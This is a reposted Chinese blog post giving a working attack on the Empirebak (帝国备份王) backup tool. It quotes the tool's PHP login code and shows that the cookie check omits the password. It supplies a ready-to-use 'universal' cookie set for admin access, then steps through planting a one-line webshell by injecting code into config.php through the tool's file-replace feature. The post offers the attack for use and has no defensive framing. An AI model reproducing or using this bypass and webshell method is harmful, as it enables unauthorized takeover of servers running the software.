博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
帝国备份王(Empirebak)万能cookie及拿shell
阅读量:6701 次
发布时间:2019-06-25

本文共 2142 字,大约阅读时间需要 7 分钟。

1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456)

登录成功设置4个cookie,看代码

function login($lusername,$lpassword,$key,$lifetime=0){    global $set_username,$set_password,$set_loginauth,$set_loginkey;    if(empty($lusername)||empty($lpassword))    {    printerror("EmptyLoginUser","index.php");    }    //验证码    if(!$set_loginkey)    {    if($key<>getcvar('checkkey')||empty($key))    {    printerror("FailLoginKey","index.php");    }    }    if(md5($lusername)<>md5($set_username)||md5($lpassword)<>$set_password)    {    printerror("ErrorUser","index.php");    }    //认证码    if($set_loginauth&&$set_loginauth!=$_POST['loginauth'])    {    printerror("ErrorLoginAuth","index.php");    }    $logintime=time();    $rnd=make_password(12);//生成随机字符    $s1=esetcookie("bakusername",$lusername,0);    $s2=esetcookie("bakrnd",$rnd,0);//随机字符    $s3=esetcookie("baklogintime",$logintime,0);    Ebak_SCookieRnd($lusername,$rnd);//    if(!$s1||!$s2)    {    printerror("NotOpenCookie","index.php");    }    printerror("LoginSuccess","admin.php");    }

再看看make_password函数

function make_password($pw_length){    $low_ascii_bound=50;    $upper_ascii_bound=122;    $notuse=array(58,59,60,61,62,63,64,73,79,91,92,93,94,95,96,108,111);    while($i<$pw_length)    {    mt_srand((double)microtime()*1000000);    $randnum=mt_rand($low_ascii_bound,$upper_ascii_bound);    if(!in_array($randnum,$notuse))    {    $password1=$password1.chr($randnum);    $i++;    }    }    return $password1;    }

这个函数只是生成随机数,再看看Ebak_SCookieRnd函数

function Ebak_SCookieRnd($username,$rnd){    global $set_loginrnd;//$set_loginrnd为config.php里面的验证随机码    $ckpass=md5(md5($rnd.$set_loginrnd).'-'.$rnd.'-'.$username.'-');//没有把密码加进去,于是漏洞产生了    esetcookie("loginebakckpass",$ckpass,0);    }

下面给出万能cookie(key:value):

ebak_loginebakckpass:119770adb578053dcb383f67a81bcbc6    ebak_bakrnd:35y5cCnnA4Kh    ebak_bakusername:admin    ebak_baklogintime:4070883661

使用以上cookie即可直接访问admin.php

2.拿shell

后台参数设置一般都设置好了,如果不能连接数据库,可以在数据库设置里填个自己的远程数据库备份数据,随便找个数据库备份,

然后到替换目录文件内容里,选择刚才备份的数据库,

"$b_table="

替换成

"phpinfo();//或者写你的一句话木马

$b_table="

访问那个目录的/config.php即可~

转载于:https://www.cnblogs.com/hookjoy/p/4292106.html

你可能感兴趣的文章
Unique Binary Search Trees
查看>>
Apache + Tomcat 配置多个应用
查看>>
2019年3月4日 701. Insert into a Binary Search Tree
查看>>
poj 2431
查看>>
UVA 10570 Meeting with Aliens
查看>>
简历撰写
查看>>
观察者模式-Observer Pattern
查看>>
非root用户sudo_ssh免密钥
查看>>
java Thread编程(二)sleep的使用
查看>>
数据结构7.3_图的遍历
查看>>
求给定数目的前 n 个素数
查看>>
MATLAB矩阵操作和算术运算符
查看>>
[渗透测试]扫目录,Sqlmap利用均超时,利用dirb扫描
查看>>
滚动行为
查看>>
tensorflow源码安装
查看>>
jquery 操作日期、星期、元素的追加
查看>>
输入一个数,判断他是不是质数
查看>>
初始化CSS
查看>>
html概述和基本结构
查看>>
地址运算符:&
查看>>